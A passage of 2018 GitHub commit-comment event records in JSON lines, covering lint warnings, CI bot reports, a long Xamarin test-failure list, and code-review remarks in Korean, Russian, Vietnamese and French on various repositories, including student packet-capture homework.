^~~~~~~~~\n```\n[R/Annotation.R:1164:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1164) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command.txt <- paste(c(firstLine,\n    ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1182:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1182) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.command.txt <- \n  ^~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-31T17:32:20Z"}
{"id":"8045577087","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/wheel-feedstock"},"payload":{"comment":{"id":29908428,"position":null,"line":null,"path":null,"commit_id":"aeb1452bd84bc39bdd8e6b5dbd6d2e9630de8b20","created_at":"2018-07-31T17:32:47Z","updated_at":"2018-07-31T17:32:47Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mingwandroid was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-31T17:32:47Z"}
{"id":"8045577225","type":"CommitCommentEvent","actor":{"login":"MattIPv4"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29908430,"position":null,"line":null,"path":null,"commit_id":"7000fd74f8015c9358a9e377627728ecd7aee52b","created_at":"2018-07-31T17:32:49Z","updated_at":"2018-07-31T17:32:49Z","author_association":"CONTRIBUTOR","body":"should be <br/>"}},"created_at":"2018-07-31T17:32:49Z"}
{"id":"8045578116","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ungmotti/pcap"},"payload":{"comment":{"id":29908436,"position":59,"line":133,"path":"main.cpp","commit_id":"dd95f3fdf9eaa884b62dac82d513e246d8cbe639","created_at":"2018-07-31T17:32:59Z","updated_at":"2018-07-31T17:32:59Z","author_association":"NONE","body":"0x800 > 0x0800\r\nETHERTYPE_IP라는 심볼을 정의해서 사용하시기 바랍니다."}},"created_at":"2018-07-31T17:32:59Z"}
{"id":"8045578794","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29908438,"position":null,"line":null,"path":null,"commit_id":"34a0f8f3430d7061c304a7882904b6b8a69abd20","created_at":"2018-07-31T17:33:08Z","updated_at":"2018-07-31T17:33:08Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (vidanovic) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a0f8f3430d7061c304a7882904b6b8a69abd20-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T17:33:08Z"}
{"id":"8045581254","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29908444,"position":null,"line":null,"path":null,"commit_id":"fe159bda2d672b71418ae722534cfd220e849bde","created_at":"2018-07-31T17:33:37Z","updated_at":"2018-07-31T17:33:37Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/105/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/105//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/fe159bda2d672b71418ae722534cfd220e849bde/105/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/fe159bda2d672b71418ae722534cfd220e849bde/105/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/fe159bda2d672b71418ae722534cfd220e849bde/105/jenkins-results/generator-diff/index.html) (please review changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/fe159bda2d672b71418ae722534cfd220e849bde/105/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n150 tests failed, 11 tests passed.\n\n## Failed tests\n\n * monotouch-test/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mini/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * link all/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link all/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mini/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * link all/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link all/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * mini/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * link all/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * link all/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * mini/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * link all/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * link all/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * MTouch tests/NUnit: Failed (Execution failed with exit code 2)\n"}},"created_at":"2018-07-31T17:33:37Z"}
{"id":"8045582495","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29908446,"position":90,"line":90,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T17:33:52Z","updated_at":"2018-07-31T17:33:52Z","author_association":"NONE","body":"не рекомендуется взаимодействовать с аттрибутами других классов \"напрямую\", не через методы этих классов\r\nвот если бы здесь было `@current_station.send_train(self)` - это было бы более верным решением\r\nно для этого тебе надо поправить методы в классе Стейшен, потому что у тебя из них идет ссылка на методы класса Трейн... а как раз в них (в классе Стейшен) вызов `trains.delete(train)` был бы уместен"}},"created_at":"2018-07-31T17:33:52Z"}
{"id":"8045582647","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ungmotti/pcap"},"payload":{"comment":{"id":29908447,"position":69,"line":139,"path":"main.cpp","commit_id":"dd95f3fdf9eaa884b62dac82d513e246d8cbe639","created_at":"2018-07-31T17:33:54Z","updated_at":"2018-07-31T17:33:54Z","author_association":"NONE","body":"sIP를 찍는 루틴과 dIP를 찍는 루틴을 별도의 함수로 만들어 코드의 중복을 없애 주세요."}},"created_at":"2018-07-31T17:33:54Z"}
{"id":"8045583046","type":"CommitCommentEvent","actor":{"login":"chiraag-nataraj"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29908449,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T17:33:58Z","updated_at":"2018-07-31T17:33:58Z","author_association":"COLLABORATOR","body":"I'm not seeing the behavior you're describing whether I have `.config/user-dirs.dirs` or not (I tested both ways)."}},"created_at":"2018-07-31T17:33:58Z"}
{"id":"8045588282","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ungmotti/pcap"},"payload":{"comment":{"id":29908456,"position":112,"line":165,"path":"main.cpp","commit_id":"dd95f3fdf9eaa884b62dac82d513e246d8cbe639","created_at":"2018-07-31T17:34:56Z","updated_at":"2018-07-31T17:34:56Z","author_association":"NONE","body":"응? ip_protocol은 1바이트입니다. ntohs를 사용할 필요가 없습니다. IPPROTO_TCP라는 심볼의 값은 0x06(한바이트)입니다."}},"created_at":"2018-07-31T17:34:56Z"}
{"id":"8045597559","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ungmotti/pcap"},"payload":{"comment":{"id":29908473,"position":127,"line":180,"path":"main.cpp","commit_id":"dd95f3fdf9eaa884b62dac82d513e246d8cbe639","created_at":"2018-07-31T17:36:41Z","updated_at":"2018-07-31T17:36:41Z","author_association":"NONE","body":"이게 될 리가? sizeof는 함수가 아닙니다.\r\n디스어셈블을 해 보면 알겠지만 sizeof(payload)는 8바이트(64비트 컴파일러)로 고정 값이 들어 가게 되어 있습니다. 항상 false로 evaluation이 됩니다."}},"created_at":"2018-07-31T17:36:41Z"}
{"id":"8045600396","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29908480,"position":10,"line":10,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T17:37:13Z","updated_at":"2018-07-31T17:37:13Z","author_association":"NONE","body":"про вызовы методов поезда здесь написал в классе Трейн подробней\r\nвкратце: лучше все-таки там вызывать методы класса Станция, нежели здесь методы класса Трейн (потому что программа скорее будет манипулировать поездами, чем станциями, и основное взаимодействие видимо будет удобней сделать через класс Трейн)"}},"created_at":"2018-07-31T17:37:13Z"}
{"id":"8045610720","type":"CommitCommentEvent","actor":{"login":"MarHS02"},"repo":{"name":"MarHS02/hello-world"},"payload":{"comment":{"id":29908503,"position":null,"line":null,"path":null,"commit_id":"864431acbb8ce99592e52e7978f2365f41f49f4a","created_at":"2018-07-31T17:39:09Z","updated_at":"2018-07-31T17:39:09Z","author_association":"OWNER","body":"Reasons to be here"}},"created_at":"2018-07-31T17:39:09Z"}
{"id":"8045621358","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"holywater1993/pcap_test"},"payload":{"comment":{"id":29908529,"position":101,"line":101,"path":"main.cpp","commit_id":"49ed0f13b15a1f43f64a53889d661791b9fe833f","created_at":"2018-07-31T17:41:09Z","updated_at":"2018-07-31T17:41:09Z","author_association":"NONE","body":"TCP Data의 길이를 계산할 때에는 caplen에서 기존 헤더의 크기들을 빼지 말고\r\n\"IPHeader의 totalLength - IPHeader의 크기 - TCPHeader의 크기\"로 계산하시기 바랍니다.\r\n당연히 ntohs 함수를 사용해야 할 것입니다."}},"created_at":"2018-07-31T17:41:09Z"}
{"id":"8045623124","type":"CommitCommentEvent","actor":{"login":"hoangtuanictvn"},"repo":{"name":"TranBaVinhSon/base_mvp_sample"},"payload":{"comment":{"id":29908532,"position":6,"line":6,"path":"app/src/main/java/com/example/sontbv/base_mvp_sample/data/db/model/Photo.kt","commit_id":"0426bba7f7b8e680d741ac5988e7dfee36482d05","created_at":"2018-07-31T17:41:28Z","updated_at":"2018-07-31T17:41:28Z","author_association":"NONE","body":"ident anh ơi :))"}},"created_at":"2018-07-31T17:41:28Z"}
{"id":"8045631038","type":"CommitCommentEvent","actor":{"login":"hoangtuanictvn"},"repo":{"name":"TranBaVinhSon/base_mvp_sample"},"payload":{"comment":{"id":29908553,"position":11,"line":11,"path":"app/src/main/java/com/example/sontbv/base_mvp_sample/data/db/model/User.kt","commit_id":"0426bba7f7b8e680d741ac5988e7dfee36482d05","created_at":"2018-07-31T17:43:02Z","updated_at":"2018-07-31T17:43:02Z","author_association":"NONE","body":"Các file thiếu blank endline"}},"created_at":"2018-07-31T17:43:02Z"}
{"id":"8045631516","type":"CommitCommentEvent","actor":{"login":"zoffixznet"},"repo":{"name":"rakudo/rakudo"},"payload":{"comment":{"id":29908560,"position":null,"line":null,"path":null,"commit_id":"d1729da26a8a2e869d87549d1cb4c6075d38d55f","created_at":"2018-07-31T17:43:08Z","updated_at":"2018-07-31T17:43:08Z","author_association":"CONTRIBUTOR","body":"Forgot to mention in the commit:\r\n\r\nAlso fixes crash in constructs like `<1/50000000000000> ** 5000000000000` because\r\nthe original code makes incorrect assumption:  `we presume it likely already blew up on the numerator`\r\n\r\nWith that, I also tweaked the thrown exceptions: if power is positive, we now always throw Overflow (and always Underflow for negative), as that's the actual reason we fail."}},"created_at":"2018-07-31T17:43:08Z"}
{"id":"8045635495","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"Hozznag/ASS01"},"payload":{"comment":{"id":29908565,"position":41,"line":41,"path":"main.cpp","commit_id":"268820b9028124dd5cd09d3a883b9f591c3bbdb3","created_at":"2018-07-31T17:43:50Z","updated_at":"2018-07-31T17:43:50Z","author_association":"NONE","body":"IP Header값 출력 이전에 Ethernet Header의 ether_type값이 0x0800인지 확인하는 코드를 추가하세요."}},"created_at":"2018-07-31T17:43:50Z"}
{"id":"8045637656","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"Hozznag/ASS01"},"payload":{"comment":{"id":29908570,"position":49,"line":49,"path":"main.cpp","commit_id":"268820b9028124dd5cd09d3a883b9f591c3bbdb3","created_at":"2018-07-31T17:44:15Z","updated_at":"2018-07-31T17:44:15Z","author_association":"NONE","body":"TCP Header값 출력 이전에 IP Header의 protocol값이 0x06인지 확인하는 코드를 추가하세요."}},"created_at":"2018-07-31T17:44:15Z"}
{"id":"8045638128","type":"CommitCommentEvent","actor":{"login":"Jim-lan"},"repo":{"name":"Jim-lan/2018-08-01-rejoin-market-predrill"},"payload":{"comment":{"id":29908572,"position":null,"line":null,"path":null,"commit_id":"8adbc3672ab110289e891e9074d6aee75fa3b073","created_at":"2018-07-31T17:44:20Z","updated_at":"2018-07-31T17:44:20Z","author_association":"OWNER","body":"original file from Master branch when project initialized."}},"created_at":"2018-07-31T17:44:20Z"}
{"id":"8045638850","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/riveralive-cms"},"payload":{"comment":{"id":29908574,"position":null,"line":null,"path":null,"commit_id":"d20478665e4f6d642315f1c37b2fdb592cb742ac","created_at":"2018-07-31T17:44:29Z","updated_at":"2018-07-31T17:44:29Z","author_association":"MEMBER","body":"Created multidev environment [riveralive-cms#ci-202](https://dashboard.pantheon.io/sites/ced938b0-bbbf-4ed2-ba1c-98b66d8ba2be#ci-202).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-202-riveralive-cms.pantheonsite.io/)"}},"created_at":"2018-07-31T17:44:29Z"}
{"id":"8045639499","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"Hozznag/ASS01"},"payload":{"comment":{"id":29908575,"position":53,"line":53,"path":"main.cpp","commit_id":"268820b9028124dd5cd09d3a883b9f591c3bbdb3","created_at":"2018-07-31T17:44:36Z","updated_at":"2018-07-31T17:44:36Z","author_association":"NONE","body":"정확한 TCP Data의 길이를 구한다음에 for문을 돌리세요."}},"created_at":"2018-07-31T17:44:36Z"}
{"id":"8045641469","type":"CommitCommentEvent","actor":{"login":"mikz"},"repo":{"name":"3scale/3scale_toolbox"},"payload":{"comment":{"id":29908580,"position":13,"line":17,"path":"spec/unit/plugin_spec.rb","commit_id":"bc312d505d1c29db2701efd4972c2ba9ed326ea2","created_at":"2018-07-31T17:44:59Z","updated_at":"2018-07-31T17:44:59Z","author_association":"MEMBER","body":"This does not say if it exit with error code 0 or 1. "}},"created_at":"2018-07-31T17:44:59Z"}
{"id":"8045644449","type":"CommitCommentEvent","actor":{"login":"feruzm"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29908588,"position":null,"line":null,"path":null,"commit_id":"3dd73de76669892f9c4a11536fd0363f55ff7a99","created_at":"2018-07-31T17:45:31Z","updated_at":"2018-07-31T17:45:31Z","author_association":"MEMBER","body":"also could we lighten the border, top post and post list has different weight on borders, let's make them both lighter similar to top posts, what do you say @talhasch, @fildunsky ?\r\n\r\n![image](https://user-images.githubusercontent.com/3015990/43476935-86e89e34-9502-11e8-99e6-f3829de47164.png)\r\n"}},"created_at":"2018-07-31T17:45:31Z"}
{"id":"8045646201","type":"CommitCommentEvent","actor":{"login":"AmauriC"},"repo":{"name":"AmauriC/tarteaucitron.js"},"payload":{"comment":{"id":29908594,"position":41,"line":1302,"path":"tarteaucitron.js","commit_id":"1ea7bfa82ab2fca3ca1faacd66b96f39b4e638d4","created_at":"2018-07-31T17:45:50Z","updated_at":"2018-07-31T17:45:50Z","author_association":"OWNER","body":"Pour moi tout est ok.\r\n\r\nIl reste des erreurs @gueyendiora ?"}},"created_at":"2018-07-31T17:45:50Z"}
{"id":"8045646868","type":"CommitCommentEvent","actor":{"login":"hoangtuanictvn"},"repo":{"name":"TranBaVinhSon/base_mvp_sample"},"payload":{"comment":{"id":29908595,"position":41,"line":22,"path":"app/src/main/java/com/example/sontbv/base_mvp_sample/network/ServiceGenerator.kt","commit_id":"3003772971ee9f1eea48f9fde0bdd1954a37c862","created_at":"2018-07-31T17:45:57Z","updated_at":"2018-07-31T17:45:57Z","author_association":"NONE","body":"Theo em nên để cùng cột với  .request()"}},"created_at":"2018-07-31T17:45:57Z"}
{"id":"8045651933","type":"CommitCommentEvent","actor":{"login":"andryyy"},"repo":{"name":"mailcow/mailcow-dockerized"},"payload":{"comment":{"id":29908613,"position":null,"line":null,"path":null,"commit_id":"68fa438a3ff312a101ad88452c562934fdae2693","created_at":"2018-07-31T17:46:54Z","updated_at":"2018-07-31T17:46:54Z","author_association":"MEMBER","body":"And this broke the layout for some languages..."}},"created_at":"2018-07-31T17:46:54Z"}
{"id":"8045652649","type":"CommitCommentEvent","actor":{"login":"kicloud"},"repo":{"name":"authomatic/authomatic"},"payload":{"comment":{"id":29908615,"position":3,"line":2,"path":"examples/gae/showcase/app.yaml","commit_id":"4060585520c70e361cea5f571ada83732be99438","created_at":"2018-07-31T17:47:01Z","updated_at":"2018-07-31T17:47:01Z","author_association":"NONE","body":"5"}},"created_at":"2018-07-31T17:47:01Z"}
